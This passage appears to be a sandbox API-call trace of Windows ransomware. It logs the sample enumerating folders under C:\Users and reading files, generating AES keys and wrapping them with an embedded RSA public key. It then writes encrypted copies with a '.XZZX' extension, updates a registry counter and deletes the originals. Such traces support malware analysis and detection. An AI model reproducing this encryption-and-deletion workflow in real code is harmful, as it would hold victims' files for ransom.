CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x75bb1021, Data2=0x22bb, Data3=0x4c24, Data4=([0]=0x87, [1]=0xd5, [2]=0x57, [3]=0x31, [4]=0x8b, [5]=0x92, [6]=0x64, [7]=0xdc))) returned 0x0 [0140.098] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0140.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0140.098] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\D7C92A1B0A54664C75BB10210E754A94.XZZX") returned 67 [0140.098] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0140.098] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini", dwFileAttributes=0x20) returned 0 [0140.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 498 os_tid = 0xb24 [0140.251] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.251] lstrcpyW (in: lpString1=0x420f460, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0140.251] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.251] SetErrorMode (uMode=0x1) returned 0x1 [0140.251] lstrcpyW (in: lpString1=0x420f860, lpString2="Everywhere.search-ms" | out: lpString1="Everywhere.search-ms") returned="Everywhere.search-ms" [0140.251] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xff288231, Data2=0xa42, Data3=0x4494, Data4=([0]=0x83, [1]=0x83, [2]=0xe1, [3]=0x56, [4]=0x9b, [5]=0x7c, [6]=0x6f, [7]=0x6))) returned 0x0 [0140.251] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0140.251] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0140.252] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\5D877AA202BF7628FF28823106E05A70.XZZX") returned 67 [0140.252] StrStrW (lpFirst="Everywhere.search-ms", lpSrch="XZZX") returned 0x0 [0140.252] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms", dwFileAttributes=0x20) returned 0 [0140.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 499 os_tid = 0xb28 [0140.407] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.407] lstrcpyW (in: lpString1=0x420f460, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0140.407] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Searches\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Searches\\") returned="\\\\?\\C:\\Users\\Default\\Searches\\" [0140.407] SetErrorMode (uMode=0x1) returned 0x1 [0140.407] lstrcpyW (in: lpString1=0x420f860, lpString2="Indexed Locations.search-ms" | out: lpString1="Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0140.407] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa40a865c, Data2=0x6c78, Data3=0x48b1, Data4=([0]=0x9e, [1]=0x9e, [2]=0x3, [3]=0x47, [4]=0x4a, [5]=0x1, [6]=0x3f, [7]=0xe9))) returned 0x0 [0140.407] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms") returned 57 [0140.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0140.407] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Searches\\559DCB201ECCBEF8A40A865C22EDA340.XZZX") returned 67 [0140.407] StrStrW (lpFirst="Indexed Locations.search-ms", lpSrch="XZZX") returned 0x0 [0140.407] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x20) returned 0 [0140.408] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 500 os_tid = 0xb2c [0140.577] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.577] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.577] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Default\\Videos\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Videos\\") returned="\\\\?\\C:\\Users\\Default\\Videos\\" [0140.577] SetErrorMode (uMode=0x1) returned 0x1 [0140.577] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.577] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x587ea559, Data2=0xfee, Data3=0x4957, Data4=([0]=0xa7, [1]=0x45, [2]=0xf6, [3]=0x6, [4]=0x43, [5]=0x3, [6]=0xfa, [7]=0xa3))) returned 0x0 [0140.577] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini") returned 39 [0140.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0140.577] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Videos\\B16DEFBE049047E2587EA55908B12C2A.XZZX") returned 65 [0140.577] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0140.577] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini", dwFileAttributes=0x20) returned 0 [0140.577] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 501 os_tid = 0xb30 [0140.739] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.739] lstrcpyW (in: lpString1=0x420f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.739] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\Public\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\") returned="\\\\?\\C:\\Users\\Public\\" [0140.739] SetErrorMode (uMode=0x1) returned 0x1 [0140.739] lstrcpyW (in: lpString1=0x420f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.739] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x90020d72, Data2=0xfc91, Data3=0x4623, Data4=([0]=0x97, [1]=0x80, [2]=0x1a, [3]=0x74, [4]=0x8b, [5]=0x6b, [6]=0x3e, [7]=0x1b))) returned 0x0 [0140.739] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\desktop.ini") returned 31 [0140.739] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0140.739] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\9665D59245322DD390020D724953121B.XZZX") returned 57 [0140.739] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0140.739] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini", dwFileAttributes=0x20) returned 1 [0140.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x82c [0140.740] ReadFile (in: hFile=0x82c, lpBuffer=0x3cc0ff0, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesRead=0x420e418*=0xae, lpOverlapped=0x0) returned 1 [0140.741] CloseHandle (hObject=0x82c) returned 1 [0140.741] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0140.741] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0140.742] SetErrorMode (uMode=0x1) returned 0x1 [0140.742] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0140.742] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf8be8) returned 1 [0140.745] CryptGenKey (in: hProv=0x3cf8be8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a6290) returned 1 [0141.279] CryptExportKey (in: hKey=0x3a6290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.279] CryptExportKey (in: hKey=0x3a6290, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0141.279] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.279] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0141.280] CryptDestroyKey (hKey=0x3a6290) returned 1 [0141.280] CryptReleaseContext (hProv=0x3cf8c70, dwFlags=0x0) returned 0 [0141.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\9665D59245322DD390020D724953121B.XZZX" (normalized: "c:\\users\\public\\9665d59245322dd390020d724953121b.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.281] WriteFile (in: hFile=0x854, lpBuffer=0x3cc0ff0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc0ff0*, lpNumberOfBytesWritten=0x420e438*=0xae, lpOverlapped=0x0) returned 1 [0141.282] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xae [0141.282] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.282] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xb3 [0141.282] WriteFile (in: hFile=0x854, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x16, lpOverlapped=0x0) returned 1 [0141.282] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc9 [0141.282] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.282] SetFilePointer (in: hFile=0x854, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xce [0141.282] SetErrorMode (uMode=0x1) returned 0x1 [0141.282] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0141.282] OutputDebugStringW (lpOutputString="end") [0141.282] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0141.282] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0141.283] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf8cf8) returned 1 [0141.283] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf8cf8, dwCertEncodingType=0x1, pInfo=0x3cf2140*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2170*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2178*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a6290) returned 1 [0141.283] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0141.284] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0141.284] CryptEncrypt (in: hKey=0x3a6290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0141.284] CryptEncrypt (in: hKey=0x3a6290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf8d80*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf8d80*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0141.284] WriteFile (in: hFile=0x854, lpBuffer=0x3cf8d80*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf8d80*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0141.284] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0141.284] WriteFile (in: hFile=0x854, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0141.284] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0141.285] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0141.285] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x858) returned 0x0 [0141.285] RegQueryValueExW (in: hKey=0x858, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xc4, lpcbData=0x420dfdc*=0x4) returned 0x0 [0141.285] RegCloseKey (hKey=0x858) returned 0x0 [0141.285] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x858) returned 0x0 [0141.285] RegSetValueExW (in: hKey=0x858, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xc5, cbData=0x4 | out: lpData=0x420dfec*=0xc5) returned 0x0 [0141.285] RegCloseKey (hKey=0x858) returned 0x0 [0141.285] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.286] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0141.286] CloseHandle (hObject=0x854) returned 1 [0141.287] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0141.287] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0141.287] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini")) returned 1 [0141.287] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\desktop.ini" (normalized: "c:\\users\\public\\desktop.ini")) returned 0 Thread: id = 502 os_tid = 0xb38 [0141.030] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0141.030] lstrcpyW (in: lpString1=0x434f460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.030] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\") returned="\\\\?\\C:\\Users\\Public\\Documents\\" [0141.030] SetErrorMode (uMode=0x1) returned 0x1 [0141.030] lstrcpyW (in: lpString1=0x434f860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0141.030] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x16cc5903, Data2=0x349e, Data3=0x4f91, Data4=([0]=0x9b, [1]=0x4a, [2]=0x28, [3]=0xa8, [4]=0x4c, [5]=0x28, [6]=0xa9, [7]=0xf6))) returned 0x0 [0141.030] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini") returned 41 [0141.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0141.030] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\94338BDA105A8F7E16CC5903148F73C6.XZZX") returned 67 [0141.030] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0141.030] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x20) returned 1 [0141.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, 